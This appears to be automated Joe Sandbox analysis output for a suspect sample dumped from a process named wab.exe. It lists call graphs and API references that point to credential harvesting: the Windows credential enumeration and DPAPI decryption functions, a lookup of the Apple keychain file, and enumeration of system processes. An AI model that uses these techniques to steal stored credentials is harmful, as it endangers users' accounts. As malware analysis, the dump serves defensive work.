40263->40265 40266 41f2e0 40264->40266 40265->40254 40268 41b1ca memset 40266->40268 40267->40252 40268->40254 40269->40194 40270->40194 40271->40194 40272->40188 40273->40189 40275 417044 40274->40275 40276 41705c 40274->40276 40278 416760 11 API calls 40275->40278 40280 417055 40275->40280 40277 417075 40276->40277 40279 41707a 11 API calls 40276->40279 40277->40200 40278->40280 40279->40275 40280->40200 40281->40232 40282->40205 40283->40205 40284->40205 40285->40205 40286->40205 40287->40223 40288->40207 40289->40221 40290->40231 40296 415cfe 40291->40296 40300 415d23 __aullrem __aulldvrm 40296->40300 40303 41628e 40296->40303 40297 4163ca 40310 416422 11 API calls 40297->40310 40299 416172 memset 40299->40300 40300->40297 40300->40299 40301 416422 10 API calls 40300->40301 40302 415cb9 10 API calls 40300->40302 40300->40303 40301->40300 40302->40300 40304 416520 40303->40304 40305 416527 40304->40305 40309 416574 40304->40309 40306 416544 40305->40306 40305->40309 40311 4156aa 11 API calls 40305->40311 40308 416561 memcpy 40306->40308 40306->40309 40308->40309 40309->40103 40310->40303 40311->40306 40333 41493c EnumResourceNamesW 37671 4287c1 37672 4287d2 37671->37672 37673 429ac1 37671->37673 37674 428818 37672->37674 37675 42881f 37672->37675 37689 425711 37672->37689 37685 425ad6 37673->37685 37741 415c56 11 API calls 37673->37741 37708 42013a 37674->37708 37736 420244 97 API calls 37675->37736 37680 4260dd 37735 424251 120 API calls 37680->37735 37682 4259da 37734 416760 11 API calls 37682->37734 37688 429a4d 37690 429a66 37688->37690 37695 429a9b 37688->37695 37689->37673 37689->37682 37689->37688 37691 422aeb memset memcpy memcpy 37689->37691 37693 4260a1 37689->37693 37704 4259c2 37689->37704 37707 425a38 37689->37707 37724 4227f0 memset memcpy 37689->37724 37725 422b84 15 API calls 37689->37725 37726 422b5d memset memcpy memcpy 37689->37726 37727 422640 13 API calls 37689->37727 37729 4241fc 11 API calls 37689->37729 37730 42413a 90 API calls 37689->37730 37737 415c56 11 API calls 37690->37737 37691->37689 37733 415c56 11 API calls 37693->37733 37696 429a96 37695->37696 37739 416760 11 API calls 37695->37739 37740 424251 120 API calls 37696->37740 37699 429a7a 37738 416760 11 API calls 37699->37738 37704->37685 37728 415c56 11 API calls 37704->37728 37707->37704 37731 422640 13 API calls 37707->37731 37732 4226e0 12 API calls 37707->37732 37709 42014c 37708->37709 37712 420151 37708->37712 37751 41e466 97 API calls 37709->37751 37711 420162 37711->37689 37712->37711 37713 4201b3 37712->37713 37714 420229 37712->37714 37715 4201b8 37713->37715 37716 4201dc 37713->37716 37714->37711 37717 41fd5e 86 API calls 37714->37717 37742 41fbdb 37715->37742 37716->37711 37720 4201ff 37716->37720 37748 41fc4c 37716->37748 37717->37711 37720->37711 37723 42013a 97 API calls 37720->37723 37723->37711 37724->37689 37725->37689 37726->37689 37727->37689 37728->37682 37729->37689 37730->37689 37731->37707 37732->37707 37733->37682 37734->37680 37735->37685 37736->37689 37737->37699 37738->37696 37739->37696 37740->37673 37741->37682 37743 41fbf1 37742->37743 37744 41fbf8 37742->37744 37747 41fc39 37743->37747 37766 4446ce 11 API calls 37743->37766 37756 41ee26 37744->37756 37747->37711 37752 41fd5e 37747->37752 37749 41ee6b 86 API calls 37748->37749 37750 41fc5d 37749->37750 37750->37716 37751->37712 37754 41fd65 37752->37754 37753 41fdab 37753->37711 37754->37753 37755 41fbdb 86 API calls 37754->37755 37755->37754 37757 41ee41 37756->37757 37758 41ee32 37756->37758 37767 41edad 37757->37767 37770 4446ce 11 API calls 37758->37770 37761 41ee3c 37761->37743 37764 41ee58 37764->37761 37772 41ee6b 37764->37772 37766->37747 37776 41be52 37767->37776 37770->37761 37771 41eb85 11 API calls 37771->37764 37773 41ee70 37772->37773 37774 41ee78 37772->37774 37832 41bf99 86 API calls 37773->37832 37774->37761 37777 41be6f 37776->37777 37778 41be5f 37776->37778 37784 41be8c 37777->37784 37797 418c63 37777->37797 37811 4446ce 11 API calls 37778->37811 37780 41be69 37780->37761 37780->37771 37782 41bee7 37782->37780 37815 41a453 86 API calls 37782->37815 37784->37780 37784->37782 37785 41bf3a 37784->37785 37786 41bed1 37784->37786 37814 4446ce 11 API calls 37785->37814 37788 41bef0 37786->37788 37791 41bee2 37786->37791 37788->37782 37790 41bf01 37788->37790 37789 41bf24 memset 37789->37780 37790->37789 37792 41bf14 37790->37792 37812 418a6d memset memcpy memset 37790->37812 37801 41ac13 37791->37801 37813 41a223 memset memcpy memset 37792->37813 37796 41bf20 37796->37789 37800 418c72 37797->37800 37798 418d51 memset memset 37799 418c94 37798->37799 37799->37784 37800->37798 37800->37799 37802 41ac3f memset 37801->37802 37804 41ac52 37801->37804 37803 41acd9 37802->37803 37803->37782 37806 41ac6a 37804->37806 37816 41dc14 19 API calls 37804->37816 37807 41aca1 37806->37807 37817 41519d 37806->37817 37807->37803 37809 41acc0 memset 37807->37809 37810 41accd memcpy 37807->37810 37809->37803 37810->37803 37811->37780 37812->37792 37813->37796 37814->37782 37816->37806 37820 4175ed 37817->37820 37828 417570 SetFilePointer 37820->37828 37823 4151b3 37823->37807 37824 41760a ReadFile 37825 417637 37824->37825 37826 417627 GetLastError 37824->37826 37825->37823 37827 41763e memset 37825->37827 37826->37823 37827->37823 37829 4175b2 37828->37829 37830 41759c GetLastError 37828->37830 37829->37823 37829->37824 37830->37829 37831 4175a8 GetLastError 37830->37831 37831->37829 37832->37774 37833 417bc5 37834 417c61 37833->37834 37835 417bda 37833->37835 37835->37834 37836 417bf6 UnmapViewOfFile CloseHandle 37835->37836 37838 417c2c 37835->37838 37840 4175b7 37835->37840 37836->37835 37836->37836 37838->37835 37845 41851e 20 API calls 37838->37845 37841 4175d6 FindCloseChangeNotification 37840->37841 37842 4175c8 37841->37842 37843 4175df 37841->37843 37842->37843 37844 4175ce Sleep 37842->37844 37843->37835 37844->37841 37845->37838 39792 4147f3 39795 414561 39792->39795 39794 414813 39796 41456d 39795->39796 39797 41457f GetPrivateProfileIntW 39795->39797 39800 4143f1 memset _itow WritePrivateProfileStringW 39796->39800 39797->39794 39799 41457a 39799->39794 39800->39799

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                            APIs
                                            • memset.MSVCRT ref: 0040DDAD
                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                            • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                              • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                            • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                            • _wcsicmp.MSVCRT ref: 0040DEB2
                                            • _wcsicmp.MSVCRT ref: 0040DEC5
                                            • _wcsicmp.MSVCRT ref: 0040DED8
                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                            • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                            • memset.MSVCRT ref: 0040DF5F
                                            • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                            • _wcsicmp.MSVCRT ref: 0040DFB2
                                            • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                            • API String ID: 594330280-3398334509
                                            • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                            • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 ??3@YAXPAX@Z 585->588 590 413edb-413ee2 587->590 588->590 598 413ee4 590->598 599 413ee7-413efe 590->599 604 413ea2-413eae CloseHandle 592->604 596 413e61-413e68 593->596 597 413e37-413e44 GetModuleHandleW 593->597 596->592 602 413e6a-413e76 596->602 597->596 601 413e46-413e5c GetProcAddress 597->601 598->599 599->580 601->596 602->592 604->583
                                            APIs
                                              • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                            • memset.MSVCRT ref: 00413D7F
                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                            • memset.MSVCRT ref: 00413E07
                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                            • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                            • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                            • API String ID: 912665193-1740548384
                                            • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                            • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                            • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                            • memcpy.MSVCRT ref: 0040B60D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                            • String ID: BIN
                                            • API String ID: 1668488027-1015027815
                                            • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                            • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                            • String ID:
                                            • API String ID: 767404330-0
                                            • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                            • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                            • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                            • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                            APIs
                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                            • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: FileFind$FirstNext
                                            • String ID:
                                            • API String ID: 1690352074-0
                                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                            APIs
                                            • memset.MSVCRT ref: 0041898C
                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: InfoSystemmemset
                                            • String ID:
                                            • API String ID: 3558857096-0
                                            • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                            • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 44 44558e-445594 call 444b06 4->44 45 44557e-44558c call 4136c0 call 41366b 4->45 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 37 445823-445826 14->37 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 49 445879-44587c 18->49 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 82 445685 21->82 83 4456b2-4456b5 call 40b1ab 21->83 31 445605-445607 22->31 32 445603 22->32 29 4459f2-4459fa 23->29 30 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->30 132 44592d-445945 call 40b6ef 24->132 133 44594a 24->133 39 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 29->39 40 445b29-445b32 29->40 151 4459d0-4459e8 call 40b6ef 30->151 152 4459ed 30->152 31->21 43 445609-44560d 31->43 32->31 50 44584c-445854 call 40b1ab 37->50 51 445828 37->51 181 445b08-445b15 call 40ae51 39->181 52 445c7c-445c85 40->52 53 445b38-445b96 memset * 3 40->53 43->21 47 44560f-445641 call 4087b3 call 40a889 call 4454bf 43->47 44->3 45->44 148 445665-445670 call 40b1ab 47->148 149 445643-445663 call 40a9b5 call 4087b3 47->149 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 50->13 66 44582e-445847 call 40a9b5 call 4087b3 51->66 59 445d1c-445d25 52->59 60 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 52->60 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 53->67 68 445b98-445ba0 53->68 87 445fae-445fb2 59->87 88 445d2b-445d3b 59->88 167 445cf5 60->167 168 445cfc-445d03 60->168 64->19 80 445884-44589d call 40a9b5 call 4087b3 65->80 135 445849 66->135 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 154 44589f 80->154 81->52 97 44568b-4456a4 call 40a9b5 call 4087b3 82->97 114 4456ba-4456c4 83->114 102 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->102 103 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->103 156 4456a9-4456b0 97->156 161 445d67-445d6c 102->161 162 445d71-445d83 call 445093 102->162 196 445e17 103->196 197 445e1e-445e25 103->197 128 4457f9 114->128 129 4456ca-4456d3 call 413cfa call 413d4c 114->129 128->6 172 4456d8-4456f7 call 40b2cc call 413fa6 129->172 132->133 133->23 135->50 148->114 149->148 151->152 152->29 154->64 156->83 156->97 174 445fa1-445fa9 call 40b6ef 161->174 162->87 167->168 179 445d05-445d13 168->179 180 445d17 168->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->59 200 445b17-445b27 call 40aebe 181->200 201 445aa3-445ab0 call 40add4 181->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->40 201->181 218 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->218 242 445e62-445e69 202->242 243 445e5b 202->243 223 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->223 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->181 223->87 255 445f9b 223->255 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->52 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->223 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                            APIs
                                            • memset.MSVCRT ref: 004455C2
                                            • wcsrchr.MSVCRT ref: 004455DA
                                            • memset.MSVCRT ref: 0044570D
                                            • memset.MSVCRT ref: 00445725
                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                              • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                              • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                            • memset.MSVCRT ref: 0044573D
                                            • memset.MSVCRT ref: 00445755
                                            • memset.MSVCRT ref: 004458CB
                                            • memset.MSVCRT ref: 004458E3
                                            • memset.MSVCRT ref: 0044596E
                                            • memset.MSVCRT ref: 00445A10
                                            • memset.MSVCRT ref: 00445A28
                                            • memset.MSVCRT ref: 00445AC6
                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                            • memset.MSVCRT ref: 00445B52
                                            • memset.MSVCRT ref: 00445B6A
                                            • memset.MSVCRT ref: 00445C9B
                                            • memset.MSVCRT ref: 00445CB3
                                            • _wcsicmp.MSVCRT ref: 00445D56
                                            • memset.MSVCRT ref: 00445B82
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                            • memset.MSVCRT ref: 00445986
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                            • API String ID: 2745753283-3798722523
                                            • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                            • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                            • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                            • String ID: $/deleteregkey$/savelangfile
                                            • API String ID: 2744995895-28296030
                                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                            Control-flow Graph

                                            APIs
                                            • memset.MSVCRT ref: 0040B71C
                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
